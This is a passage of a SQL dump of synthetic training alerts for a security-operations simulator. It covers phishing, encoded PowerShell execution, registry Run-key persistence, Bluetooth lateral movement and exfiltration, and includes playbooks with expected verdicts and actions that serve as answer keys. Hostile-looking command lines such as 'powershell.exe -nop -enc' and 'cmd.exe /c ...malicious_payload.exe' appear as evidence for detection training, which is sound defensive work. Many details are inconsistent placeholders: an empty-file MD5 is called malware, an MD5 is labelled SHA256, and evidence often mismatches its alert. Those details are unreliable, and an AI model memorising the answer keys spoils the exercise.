'{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known command and control server for APT group.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known malware used by APT groups.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"malicious_script.ps1\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"suspicious\",\"details\":\"Unusual script execution detected.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"john.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Logs\",\"verdict\":\"internal\",\"details\":\"User employed within the organization.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'Advanced', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(548, 'Malware Persistence Mechanism Activated', 'high', 'System Registry Logs', 'The malware establishes persistence by modifying registry entries, allowing it to survive system reboots and maintain a foothold within the network. The registry key associated with the malware was altered to execute the malicious binary during startup.', 'Persistence', 'T1547.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:22:34Z\",\"event_id\":\"4624\",\"event_source\":\"Microsoft-Windows-Security-Auditing\",\"computer_name\":\"compromised-host.local\",\"user\":\"john.doe\",\"registry_change\":{\"key\":\"HKEY_LOCAL_MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\",\"value_name\":\"MaliciousStartup\",\"value_data\":\"C:\\\\Windows\\\\System32\\\\evil.exe\"},\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"external_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.101\"}', '2026-01-07 22:33:18', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Known malware hash associated with APT actors.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AlienVault OTX\",\"verdict\":\"malicious\",\"details\":\"IP address associated with command and control servers.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.1.101\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"john.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"suspicious\",\"details\":\"User account used to perform registry changes.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.172Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch.\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:34Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"event_source\\\":\\\"Microsoft-Windows-Security-Auditing\\\",\\\"computer_name\\\":\\\"compromised-host.local\\\",\\\"user\\\":\\\"john.doe\\\",\\\"registry_change\\\":{\\\"key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"value_name\\\":\\\"MaliciousStartup\\\",\\\"value_data\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\evil.exe\\\"},\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.101\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.172Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:34Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"event_source\\\":\\\"Microsoft-Windows-Security-Auditing\\\",\\\"computer_name\\\":\\\"compromised-host.local\\\",\\\"user\\\":\\\"john.doe\\\",\\\"registry_change\\\":{\\\"key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"value_name\\\":\\\"MaliciousStartup\\\",\\\"value_data\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\evil.exe\\\"},\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.101\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.172Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:34Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"event_source\\\":\\\"Microsoft-Windows-Security-Auditing\\\",\\\"computer_name\\\":\\\"compromised-host.local\\\",\\\"user\\\":\\\"john.doe\\\",\\\"registry_change\\\":{\\\"key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"value_name\\\":\\\"MaliciousStartup\\\",\\\"value_data\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\evil.exe\\\"},\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.101\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.172Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:34Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"event_source\\\":\\\"Microsoft-Windows-Security-Auditing\\\",\\\"computer_name\\\":\\\"compromised-host.local\\\",\\\"user\\\":\\\"john.doe\\\",\\\"registry_change\\\":{\\\"key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"value_name\\\":\\\"MaliciousStartup\\\",\\\"value_data\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\evil.exe\\\"},\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.101\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.172Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:34Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"event_source\\\":\\\"Microsoft-Windows-Security-Auditing\\\",\\\"computer_name\\\":\\\"compromised-host.local\\\",\\\"user\\\":\\\"john.doe\\\",\\\"registry_change\\\":{\\\"key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"value_name\\\":\\\"MaliciousStartup\\\",\\\"value_data\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\evil.exe\\\"},\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.101\\\"}\"}],\"query\":\"index=main source=\\\"/var/ossec/logs/alerts/alerts.json\\\" | head 100\"}}', 0),
(549, 'Anomalous Network Activity Detected', 'high', 'Network Traffic Analysis', 'Advanced lateral movement activity detected, involving Bluetooth sniffing to map and infiltrate additional devices within the local network. The malware is expanding its reach by targeting vulnerable hosts using identified Bluetooth connections.', 'Lateral Movement', 'T1570: Lateral Tool Transfer', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:45Z\",\"event_id\":\"NT-4567\",\"source_ip\":\"192.168.1.10\",\"destination_ip\":\"10.0.0.25\",\"external_attacker_ip\":\"203.0.113.45\",\"filename\":\"BlueSniff_v2.exe\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"user\":\"internal_user\",\"bluetooth_device\":\"00:1A:7D:DA:71:11\",\"event_type\":\"lateral_movement\",\"protocol\":\"Bluetooth\",\"description\":\"Detected suspicious Bluetooth activity attempting to discover and access local devices.\",\"action\":\"attempted lateral movement\"}', '2026-01-07 22:33:18', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Local network address\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Local network address\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Public IP\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with previous attacks\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with malware used in lateral movement attacks\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"BlueSniff_v2.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Executable used for Bluetooth sniffing and lateral movement\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(550, 'Sensitive Data Exfiltration in Progress', 'critical', 'Data Loss Prevention (DLP) Logs', 'The malware has initiated a covert data exfiltration process, leveraging screen capture and audio recording modules to gather intelligence. This activity was detected as sensitive files were being transmitted to an external command and control server.', 'Exfiltration', 'T1041', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-24T14:32:56Z\",\"event_id\":\"DLP-EXFIL-001\",\"source_ip\":\"10.0.2.15\",\"destination_ip\":\"203.0.113.42\",\"file_name\":\"confidential_project.pptx\",\"file_hash\":\"a1b2c3d4e5f678901234567890abcdef12345678\",\"user\":\"jdoe\",\"process_name\":\"malware_exfil.exe\",\"process_hash\":\"b2c3d4e5f6789012a1b2c3d4e5f6789012345678\",\"protocol\":\"HTTPS\",\"action\":\"File Transfer\",\"detection_method\":\"Screen Capture and Audio Recording Modules\"}', '2026-01-07 22:33:18', '2026-02-16 18:18:56', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.42\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"IP associated with known C2 servers.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.2.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal network IP address.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"a1b2c3d4e5f678901234567890abcdef12345678\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with data exfiltration malware.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"b2c3d4e5f6789012a1b2c3d4e5f6789012345678\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with malware executable.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"confidential_project.pptx\",\"is_critical\":true,\"osint_result\":{\"source\":\"Data Loss Prevention\",\"verdict\":\"sensitive\",\"details\":\"File tagged as containing sensitive information.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Advanced', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.175Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-24T14:32:56Z\\\",\\\"event_id\\\":\\\"DLP-EXFIL-001\\\",\\\"source_ip\\\":\\\"10.0.2.15\\\",\\\"destination_ip\\\":\\\"203.0.113.42\\\",\\\"file_name\\\":\\\"confidential_project.pptx\\\",\\\"file_hash\\\":\\\"a1b2c3d4e5f678901234567890abcdef12345678\\\",\\\"user\\\":\\\"jdoe\\\",\\\"process_name\\\":\\\"malware_exfil.exe\\\",\\\"process_hash\\\":\\\"b2c3d4e5f6789012a1b2c3d4e5f6789012345678\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"File Transfer\\\",\\\"detection_method\\\":\\\"Screen Capture and Audio Recording Modules\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.175Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-24T14:32:56Z\\\",\\\"event_id\\\":\\\"DLP-EXFIL-001\\\",\\\"source_ip\\\":\\\"10.0.2.15\\\",\\\"destination_ip\\\":\\\"203.0.113.42\\\",\\\"file_name\\\":\\\"confidential_project.pptx\\\",\\\"file_hash\\\":\\\"a1b2c3d4e5f678901234567890abcdef12345678\\\",\\\"user\\\":\\\"jdoe\\\",\\\"process_name\\\":\\\"malware_exfil.exe\\\",\\\"process_hash\\\":\\\"b2c3d4e5f6789012a1b2c3d4e5f6789012345678\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"File Transfer\\\",\\\"detection_method\\\":\\\"Screen Capture and Audio Recording Modules\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.175Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-24T14:32:56Z\\\",\\\"event_id\\\":\\\"DLP-EXFIL-001\\\",\\\"source_ip\\\":\\\"10.0.2.15\\\",\\\"destination_ip\\\":\\\"203.0.113.42\\\",\\\"file_name\\\":\\\"confidential_project.pptx\\\",\\\"file_hash\\\":\\\"a1b2c3d4e5f678901234567890abcdef12345678\\\",\\\"user\\\":\\\"jdoe\\\",\\\"process_name\\\":\\\"malware_exfil.exe\\\",\\\"process_hash\\\":\\\"b2c3d4e5f6789012a1b2c3d4e5f6789012345678\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"File Transfer\\\",\\\"detection_method\\\":\\\"Screen Capture and Audio Recording Modules\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.175Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-24T14:32:56Z\\\",\\\"event_id\\\":\\\"DLP-EXFIL-001\\\",\\\"source_ip\\\":\\\"10.0.2.15\\\",\\\"destination_ip\\\":\\\"203.0.113.42\\\",\\\"file_name\\\":\\\"confidential_project.pptx\\\",\\\"file_hash\\\":\\\"a1b2c3d4e5f678901234567890abcdef12345678\\\",\\\"user\\\":\\\"jdoe\\\",\\\"process_name\\\":\\\"malware_exfil.exe\\\",\\\"process_hash\\\":\\\"b2c3d4e5f6789012a1b2c3d4e5f6789012345678\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"File Transfer\\\",\\\"detection_method\\\":\\\"Screen Capture and Audio Recording Modules\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.175Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-24T14:32:56Z\\\",\\\"event_id\\\":\\\"DLP-EXFIL-001\\\",\\\"source_ip\\\":\\\"10.0.2.15\\\",\\\"destination_ip\\\":\\\"203.0.113.42\\\",\\\"file_name\\\":\\\"confidential_project.pptx\\\",\\\"file_hash\\\":\\\"a1b2c3d4e5f678901234567890abcdef12345678\\\",\\\"user\\\":\\\"jdoe\\\",\\\"process_name\\\":\\\"malware_exfil.exe\\\",\\\"process_hash\\\":\\\"b2c3d4e5f6789012a1b2c3d4e5f6789012345678\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"File Transfer\\\",\\\"detection_method\\\":\\\"Screen Capture and Audio Recording Modules\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(551, 'Suspicious Initial Access Detected', 'medium', 'Email Gateway Logs', 'A spear-phishing email was detected targeting an engineer\'s workstation. The email contains a malicious attachment likely aimed at compromising the system.', 'Spear Phishing', 'T1566.001 - Spear Phishing Attachment', 1, 'new', NULL, '{\"timestamp\":\"2023-10-10T08:45:23Z\",\"email_id\":\"12345abcde\",\"subject\":\"Project Timeline Update\",\"sender\":\"john.doe@trustedsource.com\",\"recipient\":\"engineer@targetcompany.com\",\"attachment_name\":\"Project_Timeline_Update.docx\",\"attachment_hash\":\"3b1d5a9c5e9f6a8d8f0c4e2a7d3f9a5b\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.1.15\",\"action\":\"Delivered\",\"malware_detected\":true,\"malware_name\":\"APT_Equation_Backdoor\"}', '2026-01-07 22:35:14', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with APT activity.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the engineer\'s workstation.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3b1d5a9c5e9f6a8d8f0c4e2a7d3f9a5b\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with the APT_Equation_Backdoor malware.\"}},{\"id\":\"artifact_4\",\"type\":\"email\",\"value\":\"john.doe@trustedsource.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Email Analysis\",\"verdict\":\"suspicious\",\"details\":\"Email address used in previous phishing campaigns.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"Project_Timeline_Update.docx\",\"is_critical\":true,\"osint_result\":{\"source\":\"Attachment Analysis\",\"verdict\":\"malicious\",\"details\":\"Document contains macros that execute malicious code.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Beginner', 'SIEM', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Suspicious Initial Access Detected\",\"date\":\"2026-02-01T20:32:22.176Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(552, 'Malicious Code Execution Alert', 'high', 'Endpoint Detection and Response', 'A malicious payload was executed on a compromised system which installs a rootkit, preparing for the next phase of the attack.', 'Code Execution', 'T1059.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:22:34Z\",\"event_id\":\"4624\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.0.5\",\"username\":\"compromised_user\",\"process_name\":\"cmd.exe\",\"process_command_line\":\"cmd.exe /c C:\\\\Windows\\\\System32\\\\malicious_payload.exe\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"file_name\":\"malicious_payload.exe\",\"action\":\"Executed\",\"severity\":\"high\",\"description\":\"Malicious payload executed on endpoint\"}', '2026-01-07 22:35:14', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT Database\",\"verdict\":\"malicious\",\"details\":\"IP address associated with known APT activity\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised system\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"malicious_payload.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Repository\",\"verdict\":\"malicious\",\"details\":\"Malware file associated with known attack vectors\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"SHA256 hash identified as malicious by multiple AV engines\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(553, 'Rootkit Establishes Persistence', 'high', 'System Registry and Scheduled Tasks', 'A rootkit has been detected establishing persistence on the compromised system. It has modified system registry keys and created scheduled tasks to ensure its presence even after system reboots. The rootkit utilizes known persistence techniques to maintain long-term access.', 'Persistence Mechanism', 'T1547', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:23:45Z\",\"event_id\":\"4624\",\"system\":{\"computer\":\"compromised-machine.local\",\"user\":\"j.doe\",\"ip_address\":\"10.0.2.15\"},\"registry_changes\":[{\"key\":\"HKEY_LOCAL_MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\",\"value_name\":\"maliciousStartup\",\"data\":\"C:\\\\Windows\\\\system32\\\\malicious.exe\"}],\"scheduled_tasks\":[{\"task_name\":\"UpdateService\",\"action\":\"C:\\\\Windows\\\\system32\\\\malicious.exe\",\"trigger\":\"Logon\"}],\"network\":{\"external_ip\":\"203.0.113.45\",\"malware_hash\":\"5f4dcc3b5aa765d61d8327deb882cf99\"}}', '2026-01-07 22:35:14', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.2.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised system.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with prior attacks.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Malware hash associated with rootkit.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"j.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Database\",\"verdict\":\"internal\",\"details\":\"User account on the compromised system.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.178Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event 